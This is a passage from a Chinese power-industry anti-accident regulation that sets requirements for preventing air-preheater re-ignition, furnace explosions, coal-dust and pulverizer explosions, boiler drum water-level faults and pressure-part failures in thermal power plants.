预热器应设有完善的消防系统,空气侧和烟气侧均应装设消防水喷淋 水管,喷淋面积应覆盖整个受热面。如采用蒸汽消防系统,其汽源必须与公共汽 源相联,以保证启停、正常运行时均可随时投入以隔绝空气。 (5) 预热器应设计配套完善合理的吹灰系统,冷热端均应设有吹灰器。如 采用蒸汽吹灰,其汽源应合理选择,且必须与公共汽源相联,疏水设计合理,以 满足机组启动和低负荷运行期间的吹灰需要。 6.1.3 锅炉设计、改造时应加强油枪、小油枪、等离子燃烧器等锅炉点火/ 助燃系统的选型工作,保证其自身完备性及其与锅炉的适应性。 (1) 油燃烧器必须设置配风器,配风、雾化质量与出力要匹配,以保证油 枪点火可靠、着火稳定、燃烧完全。 (2) 循环流化床锅炉油燃烧器出口必须设计足够的燃烧空间,保证油进入 炉膛前能够完全燃烧。 (3) 锅炉采用少油/无油点火技术时必须充分把握燃用煤质特性,保证小 油枪或等离子发生装置的点火热功率与燃用煤质匹配,确保少油/无油点火的可 靠性、启动初期的燃尽率和整体性能。 (4)所有燃烧器均应设计完善可靠的火焰监测保护系统,并保证其可以真 实反应实际着火情况。 6.1.4 回转式空气预热器在制造等阶段应进行监造和正确保管: 50 (1)传热元件在出厂和安装保管期间不得采用浸油防腐方式。 (2)设备制造过程中应重视预热器着火报警系统测点元件的检查和验收。 6.1.5 必须充分重视回转式空气预热器辅助设备及系统的可靠性和可用性, 按要求进行设备传动检查和试运工作,保证系统可用,联锁保护动作正确。 (1)机组基建、调试阶段和检修期间应重视空气预热器的全面检查和资料 审查,重点包括空气预热器的热控逻辑、吹灰系统、水冲洗系统、消防系统、停 转保护、报警系统及隔离挡板等。 (2)机组基建调试前期和启动前,必须做好吹灰系统、冲洗系统、消防系 统的检查、调试、消缺和维护工作,确保吹灰、冲洗、消防行程、喷头等均无死 角、无堵塞。锅炉点火前空气预热器相关的所有系统都必须达到投运状态。 (3)基建机组首次点火前或空预器检修后应逐项检查传动火灾报警测点和 系统,确保火灾报警系统正常。 (4)基建调试或机组检修期间应进入烟道内部,就地检查、调试空预器各 烟风挡板,确保 DCS 显示、就地刻度和挡板实际位置一致,且动作灵活,关闭 严密,能起到隔绝作用。 6.1.6 机组启动前要严格执行验收和检查工作,保证空气预热器和烟风系统 干净无杂物、无堵塞。 (1) 预热器首次投运前,应将杂物彻底清理干净,蓄热元件通过全面的通 透性检查,并经制造、施工、建设、生产等各方验收合格后,方可投入运行。 (2)基建或检修期间,在炉膛或者烟风道内进行工作后,必须彻底检查清 理炉膛、风道和烟道,并经过验收,防止风机启动后杂物积聚在空预器换热元件 表面上或缝隙中。 6.1.7 锅炉冷态点火前要重视系统准备和调试工作,保证锅炉启动后燃烧良 好,特别要防止出现设备故障导致的燃烧不良。 (1) 新建机组或锅炉改造后,燃油系统必须经过辅汽吹扫,并按要求进行 油循环;首次投运前必须经过燃油泄漏试验确保各油阀的严密性。 (2)油枪、少油/无油点火系统等新设备和新系统投运前必须进行正确整定 和冷态调试。 (3)锅炉启动点火或锅炉灭火后重新点火前必须对炉膛及烟道进行充分吹 51 扫,防止未燃尽物质聚集在尾部烟道。 (4)火焰监测保护系统点火前应全部投用,严禁退出火焰监测保护系统和 随意修改逻辑。 6.1.8 锅炉启动后应精心做好运行调整工作,保证燃烧系统参数合理,燃料 燃烧完全。 (1)油燃烧器运行时,必须加强配风调整工作,从火焰根部给予足够的燃 烧风量以保证燃油燃烧稳定完全。 (2)锅炉燃用渣油或重油时应保证燃油温度和油压在规定值内,雾化蒸汽 参数在设计值内,以保证油枪雾化良好、燃烧完全。锅炉点火时应严格监视油枪 雾化情况,油枪雾化不好应立即停用并进行清理检修。 (3)采用少油/无油点火方式启动锅炉机组,应保证入炉煤质满足点火要求, 磨煤机出力、通风量和煤粉细度在合理范围;应注意检查和分析燃烧情况和锅炉 沿程温度、阻力变化情况。 (4)煤油混烧情况下应防止燃烧器超出力。 (5)点火后应加强飞灰可燃物含量的监控,并防止未完全燃烧可燃物在烟 道内的沉积。 6.1.9 要重视空气预热器的吹灰,必须精心组织机组冷态启动和低负荷运行 情况下的吹灰工作,做到合理吹灰。 (1)投入蒸汽吹灰器前应进行充分疏水,确保吹灰要求的蒸汽过热度。 (2)采用少油/无油点火方式启动的机组,锅炉启动初期空气预热器必须连 续吹灰。 (3)机组启动期间,锅炉负荷低于 25%额定负荷时,空气预热器应连续吹 灰;锅炉负荷大于 25%额定负荷时,至少每 8h 吹灰一次;当回转式空气预热器 烟气侧压差增加时,应增加吹灰次数;当低负荷煤、油混烧时,空气预热器应连 续吹灰。 6.1.10 要加强对回转式空气预热器的检查,重视发挥水冲洗的作用,及时精 心组织,对回转式空气预热器正确地进行水冲洗。 (1)机组每次大、小修或锅炉停炉 1 周以上时必须对预热器受热面进行检 查。若锅炉较长时间低负荷燃油或煤油混烧,应根据具体情况安排停炉对预热器 52 受热面进行检查。 (2)预热器停炉检查若发现有存挂油垢或积灰堵塞现象,应及时清理,必 要时应及时组织进行水冲洗。 (3)机组运行中,如果预热器阻力超过对应工况设计阻力的 150%,应及时 安排全面清理。 (4)预热器水冲洗必须事先制定全面的技术措施并通过审批,冲洗工作必 须严格按措施执行,一次性彻底冲洗干净,达到冲洗工艺要求,并验收合格。 (5)预热器冲洗后必须正确地进行干燥,并保证彻底干燥。不能立即启动 引送风机进行强制通风干燥,防止炉内积灰被空预器金属表面水膜吸附造成二次 污染。 6.1.11 应重视并加强对锅炉尾部再次燃烧事故风险点的监控。 (1)运行规程应明确省煤器、脱硝装置、空气预热器等部位烟道在不同工 况的烟气温度限制值。 (2)运行中应加强监视回转式空气预热器出口烟风温度变化情况,当烟气 温度超过规定值、有再燃前兆时,应立即停炉并及时采取消防措施。 (3)机组停运后和温、热态启动时,是回转式空气预热器受热和冷却条件 发生巨大变化的时候,容易产生热量积聚引发着火,应更重视运行监控和检查, 如有再燃前兆,必须及早发现,及早处理。 (4) 锅炉停炉后,严格按照运行规程和厂家要求停运空气预热器,应加强 停炉后的回转式空气预热器运行监控,防止异常发生。 (5)应根据运行工况及时优化、调整脱硝装置喷氨量,保证氨逃逸量在合 理区间,以减轻由于硫酸氢铵引起的空气预热器堵塞。 6.1.12 回转式空气预热器跳闸后应防止发生再燃及空预器故障。 (1)若发现预热器停转,立即将其隔绝,投入盘车装置。若挡板隔绝不严 或转子盘不动,应立即停炉。 (2) 若预热器未设出入口烟/风挡板,空气预热器停转应立即停炉。 6.1.13 加强空预器外的其它特殊设备和部位防再次燃烧事故工作。 (1) 在低负荷阶段有少油/无油助燃装置投运或煤油混烧期间,脱硝反应 器内必须加强吹灰,监控反应器前后阻力及烟气温度,防止反应器内催化剂区域 53 有未燃尽物质燃烧,反应器灰斗需要及时排灰,防止沉积。 (2) 新建燃煤机组尾部烟道下部省煤器灰斗应设可靠输灰系统,以保证未 燃物可以及时送出系统。 (3)如果低负荷燃油、微油点火、等离子点火、或者煤油混烧电除尘器在 投入运行,电除尘器应降低、或者限二次电压、电流运行,防止在积尘极和放电 极之间燃烧、或者在电除尘器内部发生爆炸。期间除灰系统必须连续投入。 (4)布袋除尘器应设可靠的降温系统或保护逻辑以防止除尘器入口烟气温 度超限损坏除尘布袋。如降温系统无法控制烟温,应立即降负荷或停炉。在低负 荷阶段有少油/无油助燃装置投运或煤油混烧期间,布袋除尘器宜停止清灰或减 少清灰频次。 (5)对于安装在锅炉脱硝系统与除尘器间的烟气余热利用装置,在低负荷 阶段有少油/无油助燃装置投运或煤油混烧期间,烟气余热利用装置必须加强吹 灰,监控装置前后阻力及烟气温度,防止装置管排间有未燃尽物质积存燃烧。对 于布置烟气余热利用装置的烟道中容易积灰的位置应设计除灰系统,并及时排 灰,防止沉积。 (6)在低负荷阶段有少油/无油助燃装置投运或煤油混烧期间,要防止由于 锅炉未燃尽的物质落入干排渣系统的钢带二次燃烧,损坏钢带。要加强就地巡检, 必要时应派人就地监控。 (7)锅炉尾部有非金属防腐内衬的部位,检修时有动火操作,必须有相应 的防火措施并严格执行。 6.2 防止锅炉炉膛爆炸事故 6.2.1 防止锅炉灭火的重点要求 (1)锅炉炉膛安全监控系统的设计、选型、安装、调试等各阶段都应严格 执行《火力发电厂锅炉炉膛安全监控系统技术规程》(DL/T 1091-2018)中的 安全规定。 (2)根据《电站锅炉炉膛防爆规程》(DL/T 435-2018)中有关防止炉膛 灭火放炮的规定以及设备的实际状况,如煤质监督、混配煤、燃烧调整、深度调 峰运行等内容,制定防止锅炉灭火放炮的措施并严格执行。 (3)加强燃煤的监督管理,制定配煤掺烧管理办法,完善混煤设施。加强 54 负荷预测和煤质分析,根据负荷和煤质变化做好深度调峰用煤管理和调整燃烧的 应变措施,防止煤质突变引发燃烧失稳和锅炉灭火事故。 (4)锅炉新投产、改进性大修后或入炉燃料与设计燃料有较大差异时,应 进行燃烧调整,以确定合理的配风方式、过量空气系数、煤粉细度、燃烧器倾角 或旋流强度及不投油最低稳燃负荷等。 (5)当锅炉已经灭火或全部运行磨煤机的多个火检保护信号闪烁失稳时, 严禁投油枪、微油点火枪、等离子点火枪等引燃。当锅炉灭火后,要立即停止燃 料(含煤、油、燃气、制粉乏气风)供给,严禁用爆燃法恢复燃烧。重新点火前 必须对锅炉进行充分通风吹扫,以排除炉膛和烟道内的可燃物质。 (6)100MW 及以上等级机组的锅炉应装设锅炉灭火保护装置。该装置应包 括但不限于以下功能:炉膛吹扫、锅炉点火、主燃料跳闸、全炉膛火焰监视、灭 火保护和主燃料跳闸首出等。 (7)锅炉灭火保护装置和就地控制设备电源应可靠,电源应采用两路交流 220V 供电电源,其中一路应为交流不间断电源,另一路电源引自厂用事故保安 电源。当设置冗余不间断电源系统时,也可两路均采用不间断电源,但两路进线 应分别取自不同的供电母线,防止因瞬间失电造成失去锅炉灭火保护功能。 (8)参与灭火保护的炉膛压力测点应单独设置并冗余配置,必须保证炉膛 压力信号取样部位设计合理、安装正确,各压力信号的取样管相互独立,系统工 作可靠。炉膛负压模拟量测点应冗余配备 4 套或以上,各套测量系统的取样点、 取样管、压力变送器均单独设置:其中三个为调节用,量程应大于炉膛压力异常 联跳风机定值,另一个作监视用,其量程应大于炉膛瞬态承压能力极限值。 (9)炉膛压力保护定值应综合考虑炉膛防爆能力、炉底密封承受能力和锅 炉正常燃烧要求合理设置;新机启动或机组检修后启动时必须进行炉膛压力保护 带工质传动试验。 (10)加强锅炉灭火保护装置的维护与管理,防止发生火焰探头烧毁和污染 失灵、炉膛负压管堵塞等问题,确保锅炉灭火保护装置可靠投用。 (11)每个煤、油、气燃烧器都应单独设置火焰检测装置。火焰检测装置应 精细调整,保证锅炉在全负荷段(含深度调峰工况)和全适用煤种条件下都能正 确检测到火焰。火焰检测装置冷却用气源应稳定可靠。 55 (12)锅炉运行中严禁随意退出锅炉灭火保护。因设备缺陷需部分退出锅炉 灭火保护时,应严格履行审批手续,事先做好安全措施并及时恢复。严禁锅炉在 灭火保护装置退出情况下启动。 (13)加强设备检修管理和运行维护,防止出现炉膛严重漏风、一次风管不 畅、送风不正常脉动、直吹式制粉系统磨煤机堵煤断煤和粉管堵粉、中储式制粉 系统给粉机下粉不均或煤粉自流、热控设备失灵等问题。 (14)加强点火油、气系统的维护管理,消除泄漏,防止燃油、燃气漏入炉 膛发生爆燃。燃油、燃气速断阀要定期试验,确保动作正确、关闭严密。 (15)加强锅炉点火(稳燃)系统的检查和维护,定期对各型油枪进行清理 和投入试验,确保油枪动作可靠、雾化良好;定期对等离子点火系统进行拉弧试 验,确保点火(稳燃)系统可靠备用,能在锅炉深度调峰运行或燃烧不稳时及时 投入。 (16)在停炉检修或备用期间,必须检查确认燃油或燃气系统阀门关闭的严 密性。锅炉点火前应进行燃油、燃气系统泄漏试验,合格后方可点火启动。 (17)配置少油/无油点火系统煤粉锅炉的灭火保护应参照有关规范合理制 定:采用中速磨煤机直吹式制粉系统时,180s 内未点燃时应立即停止相应磨煤 机的运行;中储式制粉系统在 30s 内未点燃时,应立即停止相应给粉机的运行; 启动点火期间严禁磨煤机出力超出等离子或小油枪最大允许范围运行。点火失败 后必须经充分通风吹扫、查明原因后再重新投入。锅炉点火时严禁解除全炉膛灭 火保护,严禁强制火检信号。 (18)加强热工控制系统的维护与管理,防止因分散控制系统死机导致的锅 炉炉膛灭火放炮事故。 (19)锅炉实施灵活性改造应全面考虑掉渣、塌灰、辅机跳闸、负荷突变等 各类内扰或外扰对稳燃的影响,充分论证并制定可靠的燃烧器改造方案,消除燃 烧器缺陷,确定深度调峰工况下的锅炉合理的燃烧方式和制粉系统组合方式。 (20)应通过试验确定锅炉深度调峰运行稳燃安全边界,并制定可靠的稳燃 运行技术措施。当深度调峰运行出现燃烧不稳或达到稳燃安全边界时,应及时调 整燃烧或投入稳燃系统。深度调峰工况不应采取煤质特性差异较大的煤种掺烧运 行。 56 (21)完成灵活性改造的锅炉,应通过燃烧调整确认深度调峰工况下主辅机 运行方式,并建立相应的风煤比、一次风压、二次风量、直流燃烧器摆角或旋流 燃烧器旋流强度等参数的控制策略,完善深度调峰运行措施和应急预案。锅炉所 有保护和自动投入率不应因深度调峰运行而降低。 (22)锅炉深度调峰运行应同步改进并完善吹灰系统和吹灰控制策略。 6.2.2 防止锅炉严重结渣的重点要求 (1)锅炉炉膛的设计、选型应参照《大容量煤粉燃烧锅炉炉膛选型导则》 (DL/T 831-2015)的有关规定进行。 (2)重视锅炉燃烧器的安装、检修和维护,保留必要的安装记录,确保安 装角度正确,避免一次风射流偏斜产生贴壁气流。燃烧器改造后的锅炉投运前应 进行冷态炉膛空气动力场试验,以检查燃烧器安装角度是否正确,确定锅炉炉内 空气动力场符合设计要求。 (3)加强氧量计、一氧化碳测量装置、风量测量装置及二次风门等锅炉燃 烧监视、调整相关设备的管理与维护,形成定期校验制度,确保其指示准确,动 作正确,避免在炉内近壁区域形成还原性气氛,从而加剧炉膛结渣。 (4)采用与锅炉相匹配的煤种,是防止炉膛结渣的重要措施,当煤种改变 时,要进行变煤种燃烧调整试验。 (5)加强运行培训,使运行人员了解防止炉膛和燃烧器结渣的要素,熟悉 燃烧调整手段。 (6)运行人员应监视和分析炉膛结渣情况,发现结渣,应及时处理。 (7)应加强锅炉吹灰器维护、检修,设置合理的吹灰参数,严格执行定期 吹灰制度,防止受热面结渣沾污造成超温。 (8)锅炉受热面及炉底等部位严重结渣,影响锅炉安全运行时,应立即停 炉处理。 6.2.3 循环流化床锅炉防爆的重点要求 (1)应严格按照制造厂规定的可燃物含量要求,筛选合适的启动床料,严 禁使用可燃物含量超标的启动床料。 (2)锅炉启动前或主燃料跳闸(MFT)、锅炉跳闸(BT)后应根据床温情 况严格执行炉膛冷态或热态吹扫程序,禁止采用降低一次风量至最小控制流化风 57 量以下的方式点火。 (3)确保床上、床下油枪雾化良好、燃烧完全。油枪投用时应严密监视油 枪雾化和燃烧情况,发现油枪雾化不良应立即停用,并及时进行清理检修;油枪 停用时应确保不发生燃油泄漏。 (4)对于循环流化床锅炉,应根据实际燃用煤质着火点情况进行间断投煤 操作,禁止床温未达到投煤允许条件连续大量投煤。锅炉运行中严禁退出床温低 触发主燃料跳闸的保护。 (5)循环流化床锅炉压火应先停止给煤机,切断所有燃料,并严格执行炉 膛吹扫程序,待床温开始下降、氧量回升时再按正确顺序停风机;禁止通过锅炉 跳闸(BT)直接跳闸风机联跳主燃料跳闸(MFT)的方式压火。压火后的热启 动应严格执行热态吹扫程序,并根据床温情况进行投油升温或投煤启动。 (6)循环流化床锅炉水冷壁泄漏后,应尽快停炉,并保留一台引风机运行, 禁止闷炉;冷渣器受热面泄漏后,应立即切断炉渣进料,并隔绝冷却水。 (7)燃料掺烧应定期做好日常入炉煤质分析,确保投煤允许床温高于入炉 煤着火点,新燃料首次掺烧应参照执行《循环流化床锅炉燃料掺烧技术导则》 (DL/T 2199-2020)的规定。 6.2.4 防止锅炉内爆的重点要求 (1)新建机组引风机和脱硫增压风机的最大压头设计必须与炉膛及尾部烟 道防内爆能力相匹配,设计炉膛及尾部烟道防内爆强度应大于引风机及脱硫增压 风机压头之和。 (2)机组改造增加烟气系统阻力时,应重新核算引风机出力裕度及锅炉尾 部烟道的负压承受能力;引风机出力不足时应同步增容改造,对烟道强度不足部 分应进行重新加固。检修时应对烟风道的壁面、内部支撑情况进行检查,腐蚀、 磨损、变形严重的部分必须进行加固或更换。 (3)应特别重视防止机组高负荷灭火或设备故障瞬间产生过大炉膛负压对 锅炉炉膛及尾部烟道造成的内爆危害。锅炉主保护应设置炉膛负压低二值跳锅炉 保护;烟风系统联锁应设置炉膛负压低三值跳引风机的保护;机组 RUNBACK 功能应可靠投用。 (4)加强引风机、脱硫增压风机等设备的检修维护工作,定期对入口调节 58 装置进行检查和试验,确保动作灵活可靠和炉膛负压自动调节特性良好,防止机 组运行中设备故障时或锅炉灭火后产生过大负压。 (5)运行规程中必须有防止炉膛内爆的条款和事故处理预案。 6.3 防止制粉系统爆炸和煤尘爆炸事故 6.3.1 防止制粉系统爆炸的重点要求 (1)在锅炉设计和制粉系统设计选型时期,应严格遵照相关规程要求,保 证制粉系统设计和磨煤机的选型,与燃用煤种特性和锅炉机组性能要求相匹配和 适应,必须体现出制粉系统防爆设计。 (2)不论是新建机组设计、还是由于改烧煤种等原因进行锅炉燃烧系统改 造,都不应忽视制粉系统的防爆要求,当煤的干燥无灰基挥发分大于 25%(或煤 的爆炸性指数大于 3.0)时,不宜采用中间储仓式制粉系统,如必要时宜抽取炉 烟干燥或者加入惰性气体。 (3)对于制粉系统,应设计可靠足够的温度、压力、流量等测点和完备的 连锁保护逻辑,以保证对制粉系统状态测量指示准确、监控全面、动作合理。中 间储仓制粉系统的粉仓和直吹制粉系统的磨煤机出口,应设置足够的温度测点和 温度报警装置,并定期进行校验。 (4)制粉系统设计时,应尽量减少水平管段,整个系统要做到严密、内壁 光滑、无积粉死角。 (5)煤仓、粉仓、制粉和送粉管道、制粉系统阀门、制粉系统防爆压力和 防 爆 门 等 的 防 爆 设 计 符 合 《 火 力 发 电 厂 烟 风 煤 粉 管 道 设 计 规 范 》 ( DL/T 5121-2020)和《火力发电厂制粉系统设计计算技术规定》(DL/T 5145-2012) 的相关要求。 (6)热风道与制粉系统连接部位,以及排粉机出入口风箱的连接部位,应 达到防爆规程规定的抗爆强度。 (7)制粉系统应设计配置齐全的磨煤机出口隔离门和热风隔绝门。 (8)对于爆炸特性较强煤种,制粉系统应配套设计相应的消防系统和充惰 系统。该系统应汽(气)源稳定,疏水符合设计和运行要求,并定期进行维护和 检查,确保能够随时按要求投用。 (9)原煤仓应安装性能适应的疏松装置,能够在机组运行中发挥作用,及 59 时有效防止原煤仓发生堵塞、棚煤、板结、和局部走空等问题。 (10)加强防爆门的检查和管理工作,防爆薄膜应有足够的防爆面积和规定 的强度。防爆门一旦动作喷出物的喷射方向和范围,不能直对通道和电缆桥架, 以避免危及人身安全、损坏设备和烧损电缆。 (11)保证系统安装质量,保证连接部位严密、光滑、无死角,避免出现局 部积粉。 (12)做好“三块分离”和入炉煤杂物清除工作,保证制粉系统运行正常。 (13)应做好磨煤机风门挡板和石子煤排渣门的检修维护工作,保证磨煤机 能够隔离严密。 (14)中储式制粉系统粉仓、绞龙的吸潮管应完好,管内通畅无阻,运行中 粉仓要保持适当负压。 (15)定期检查煤仓、粉仓仓壁内衬钢板,严防衬板磨漏、夹层积粉自燃。 每次大修煤粉仓应清仓,并检查粉仓的严密性及有无死角,特别要注意仓顶板— 大梁搁置部位有无积粉死角。 (16)在锅炉机组进行跨煤种改烧时,在对燃烧器和配风方式进行改造的同 时,应对制粉系统进行安全评估,必要时进行配套改造,以保证炉膛和制粉系统 全面达到安全要求。 (17)加强入厂煤和入炉煤的管理工作,建立煤质分析和配煤管理制度,掺 烧和燃用易燃易爆煤种应进行可行性研究,分析评估设备、系统、运行以及管理 等方面存在的不适应性,必要情况下应加以设备改造,提前制定完善的管理制度 和技术措施并进行培训,具体掺烧和燃用时应及早通知运行人员,以便加强监视 和检查,发现异常及时处理。 (18)中储式制粉系统要坚持执行定期降粉制度和停炉前煤粉仓空仓制度。 (19)根据煤种的自燃特性,建立停炉清理煤仓制度,防止因长期停运导致 原煤仓自燃。 (20)制粉系统的爆炸绝大部分发生在制粉设备的启动和停机阶段,因此不 论是制粉系统的控制设计,还是运行规程中的操作规定和启停措施,特别是具体 的运行操作,都必须遵守通风、吹扫、充惰、加减负荷等要求,保证各项操作规 范,负荷、风量、温度等参数控制平稳,避免大幅扰动。 60 (21)磨煤机运行及启停过程中应严格控制磨煤机出口温度不超过规定值。 (22)针对燃用煤质和制粉系统特点,制定合理的制粉系统定期轮换制度, 防止备用制粉系统在原煤仓或磨煤机内部发生自燃。 (23)加强运行检查、监控,及时采取措施,避免制粉系统运行中出现断煤、 满煤以及走空原煤仓等问题。一旦出现断煤、满煤问题,必须及时正确处理,防 止出现严重超温和煤在磨煤机及系统内不正常存留。正压制粉系统磨煤机运行中 应避免发生原煤仓空仓问题,杜绝热风通过磨煤机上窜至原煤仓,引发原煤仓内 发生爆炸事故。 (24)中速磨煤机定期对石子煤箱进行检查,及时排石子煤;正常运行中石 子煤量较少时也要定期排石子煤,以防止石子煤箱自燃。 (25)对于中速磨煤机直吹制粉系统,如采用风道燃烧器加热一次风进行制 粉,应重视风道燃烧器系统各设备、部件、测点、以及风道燃烧器后膨胀节等的 检查维护,确保燃烧正常、燃烧器下游温度合理,防止膨胀节超温老化发生撕裂 泄漏,引发附近设备、电缆着火,造成二次连带事故。 (26)对于采用直吹制粉系统的机组燃用经过干燥提质的褐煤时,要合理优 化干燥后褐煤的剩余水分以及磨煤机出口一次风温度限制;应配套完善的防爆措 施,防止发生制粉系统爆炸事故。 (27)加强制粉系统运行状态管理,定期对煤粉细度、煤粉管道一次风流速 测量和偏差调整,防止发生一次风管道堵管问题。 (28)当发现备用磨煤机内着火时,要立即关闭其所有的出入口风门挡板以 隔绝空气,并用蒸汽消防进行灭火。 (29)制粉系统煤粉爆炸事故发生后,应找到积粉着火点并分析清楚造成积 粉的原因,采取针对性措施消除积粉。必要时应进行针对性改造。 (30)制粉系统检修动火前应将积粉清理干净,并正确办理动火工作票手续, 规范作业。 6.3.2 防止煤尘爆炸的重点要求 (1)消除制粉系统和输煤系统的粉尘泄漏点,降低煤粉浓度。大量放粉或 清理煤粉时,应制定和落实相关安全措施,应尽可能避免扬尘,杜绝明火,防止 煤尘爆炸。 61 (2)煤粉仓、制粉系统和输煤系统附近应有消防设施,并备有专用的灭火 器材,消防系统水源应充足、水压符合要求。消防灭火设施应保持完好,按期进 行试验(试验时灭火剂不进入粉仓)。 (3)煤粉仓投运前应做严密性试验。凡基建投产时未做过严密性试验的要 补做漏风试验,如发现有漏风、漏粉现象应及时消除。 (4)在微油或等离子点火期间,除灰系统储仓需经常卸料,防止储仓未燃 尽物质自燃爆炸。 6.4 防止锅炉满水和缺水事故 6.4.1 汽包锅炉应至少配置 2 只彼此独立的就地汽包水位计和 3 只远传汽包 水位计。水位计的配置应采用 2 种以上工作原理共存的配置方式,以保证各种运 行工况下对锅炉汽包水位的正确监视。按《火电发电厂锅炉汽包水位测量系统技 术规程》(DL/T 1393-2014)中汽包水位测量系统的量程相关要求,应配置大 量程的差压式或电极式汽包水位测量装置。 6.4.2 汽包水位计的安装: (1) 取样管应穿过汽包内壁隔层,管口应尽量避开汽包内水汽工况不稳定 区(如:安全阀排汽口、汽包进水口、下降管口、汽水分离器水槽处等),若不 能避开时,应在汽包内取样管口加装稳流装置。 (2) 汽包水位计水侧取样管孔的位置应低于锅炉汽包水位低停炉保护动作 值,汽侧取样管孔的位置应高于锅炉汽包水位高停炉保护动作值,并应有足够的 裕量。 (3)水位计、水位平衡容器或变送器与汽包联接的取样管,应至少有 1: 100 的斜度:就地联通管式水位计的汽侧取样管位置高于取样孔侧位置,水侧取 样管位置低于取样孔侧位置;差压式水位计的汽侧取样管位置低于取样孔侧位 置,水侧取样管位置高于取样孔侧位置。 (4)新安装的机组必须核实汽包水位取样孔的位置、结构及水位计平衡容 器安装尺寸,均符合要求。 (5) 差压式水位计严禁采用将汽水取样管引到一个连通容器(平衡容器), 再在平衡容器中段或中高段引出差压水位计的汽水侧取样的方法。 6.4.3 对于过热器出口压力为 13.5MPa 及以上的锅炉,其汽包水位计应以差 62 压式(带压力修正回路)水位计为基准。汽包水位信号应采用三选中值的方式进 行优选。 (1) 差压水位计(变送器)应采用压力补偿。汽包水位测量应充分考虑平 衡容器的温度变化造成的影响,必要时采用补偿措施。 (2) 汽包水位测量系统,应采取正确的保温、伴热及防冻措施,以保证汽 包水位测量系统的正常运行及正确性。 6.4.4 汽包就地水位计的零位应以制造厂提供的数据为准,并进行核对、标 定。随着锅炉压力的升高,就地水位计指示值愈低于汽包真实水位,下表为不同 压力下就地水位计的正常水位示值和汽包实际零水位的差值Δh,仅供参考: 汽包压力(MPa) 16.14~17.65 17.66~18.39 18.40~19.60 Δh(mm) -51 -102 -150 6.4.5 按规程要求定期或检修后对汽包水位计进行零位校验,核对各汽包水 位测量装置间的示值偏差,当同一侧水位测量偏差大于 30mm 或不同侧水位在各 自取中间测量值后的偏差大于 50mm 时,应立即汇报,并查明原因予以消除。 6.4.6 严格按照运行规程及各项制度,对水位计及其测量系统进行检查及维 护。机组启动调试时应对汽包水位校正补偿方法进行校对、验证,并进行汽包水 位计的热态调整及校核。新机组验收时应有汽包水位计安装、调试及试运专项报 告,列入验收主要项目之一。 6.4.7 当一套水位测量装置因故障退出运行时,应填写处理故障的工作票, 工作票应写明故障原因、处理方案、危险因素预告等注意事项,一般应在 8 小时 内恢复。若不能完成,应制定措施,经主管领导批准,允许延长工期,但最多不 能超过 24 小时,并报上级主管部门备案。 6.4.8 当不能保证两种类型水位计正常运行时,必须停炉处理。 6.4.9 锅炉高、低水位保护要求如下: (1)锅炉汽包水位高、低保护应采用独立测量的三取二的逻辑判断方式。 当有一点因某种原因须退出运行时:应自动转为二取一的逻辑判断方式,办理审 批手续,限期(不宜超过 8 小时)恢复;当有二点因某种原因须退出运行时,应 自动转为一取一的逻辑判断方式,应制定必要的安全运行措施,严格执行审批手 续,限期(8 小时以内)恢复,如逾期不能恢复,应立即停止锅炉运行。当自动 63 转换逻辑采用品质判断等作为依据时,在逻辑正式投运前应进行详细试验确认, 不可简单的采用超量程等手段作为品质判断。 (2)锅炉汽包水位保护所用的三个独立的水位测量装置输出的信号均应分 别通过三个独立的 I/O 模件引入 DCS 的冗余控制器。每个补偿用的汽包压力变 送器也应分别独立配置,其输出信号引入相对应的汽包水位差压信号 I/O 模件。 (3)锅炉汽包水位保护在锅炉启动前和停炉前应进行实际传动校检。用上 水方法进行高水位保护试验、用排污门放水的方法进行低水位保护试验,严禁用 信号短接方法进行模拟传动替代。 (4)锅炉汽包水位保护的定值和延时值随炉型和汽包内部结构不同而异, 延时值的设置还应符合防止瞬间虚假水位误动及防止事故时水位偏差进一步扩 大导致重大事故的原则,汽包水位保护的定值和延时值的具体数值应由锅炉制造 厂确定,不应自行设置上述数值。 (5)锅炉水位保护的停退,必须严格执行审批制度。 (6)汽包锅炉水位保护是锅炉启动的必备条件之一,水位保护不完整严禁 启动。 6.4.10 当在运行中无法判断汽包真实水位时,应紧急停炉。 6.4.11 对于控制循环锅炉,应设计炉水循环泵差压低低停炉保护。炉水循环 泵差压信号应采用独立测量的元件,对于差压低停泵保护应采用二取二的逻辑判 别方式,当有一点故障退出运行时,应自动转为二取一的逻辑判断方式,并办理 审批手续,限期恢复(不宜超过 8 小时)。当二点故障超过 4 小时时,应立即停 止该炉水循环泵运行。 6.4.12 对于直流炉,应设计省煤器入口流量低保护,流量低保护应遵循三取 二原则。主给水流量测量应分别取自三个独立的取样点、传压管路和差压变送器 并进行三选中后的信号。 6.4.13 直流炉应严格控制燃水比,严防燃水比失调。湿态运行时应严密监视 分离器水位,干态运行时应严密监视微过热点(中间点)温度,防止蒸汽带水或 金属壁温超温。 6.4.14 高压加热器保护装置及旁路系统应正常投入,并按规程进行试验,保 证其动作可靠,避免给水中断。当因某种原因需退出高压加热器保护装置时,应 64 制定措施,严格执行审批手续,并限期恢复。 6.4.15 给水系统中各备用设备应处于正常备用状态,按规程定期切换。当失 去备用时,应制定安全运行措施,限期恢复投入备用。 6.4.16 建立锅炉汽包水位、炉水泵差压及主给水流量测量系统的维修和设备 缺陷档案,对各类设备缺陷进行定期分析,找出原因及处理对策,并实施消缺。 6.4.17 运行人员必须严格遵守值班纪律,监盘思想集中,经常分析各运行参 数的变化,调整要及时,准确判断及处理事故。不断加强运行人员的培训,提高 其事故判断能力及操作技能。 6.5 防止锅炉承压部件失效事故 6.5.1 各单位应成立防止压力容器和锅炉爆漏工作小组,加强专业管理、技 术监督管理和专业人员培训考核,健全各级责任制。 6.5.2 新建锅炉产品的制造、安装过程应由特种设备监检单位实施制造、安 装阶段监督检验。锅炉投入使用前或投入使用后 30 日内,使用单位应按照《特 种设备使用管理规则》(TSG 08-2017)办理使用登记,申领使用登记证。不按 规定检验、办理使用登记的锅炉,严禁投入使用。 6.5.3 电站锅炉范围内管道包括主给水管道、主蒸汽管道、再热蒸汽管道等 应符合《锅炉安全技术规程》(TSG 11-2020)的要求。建设单位采购该范围内 管道中使用的元件组合装置(减温减压装置、堵阀、流量计(壳体)、工厂化预 制管段)时,应在采购合同中注明“要求按照锅炉部件实施制造过程监督检验” 的要求。制造单位制造上述元件组合装置时,应向经国家市场监督管理总局核准 的具备锅炉或压力管道监检资质的检验机构提出监检申请,由检验机构按照安全 技术规范和相关标准实施制造过程监督检验,合格后出具监检报告和证书。未经 监督检验合格的管道元件组合装置不得在电站锅炉范围内管道中使用。 6.5.4 严格做好锅炉制造、安装和调试期间的监造和监理工作。新建锅炉承 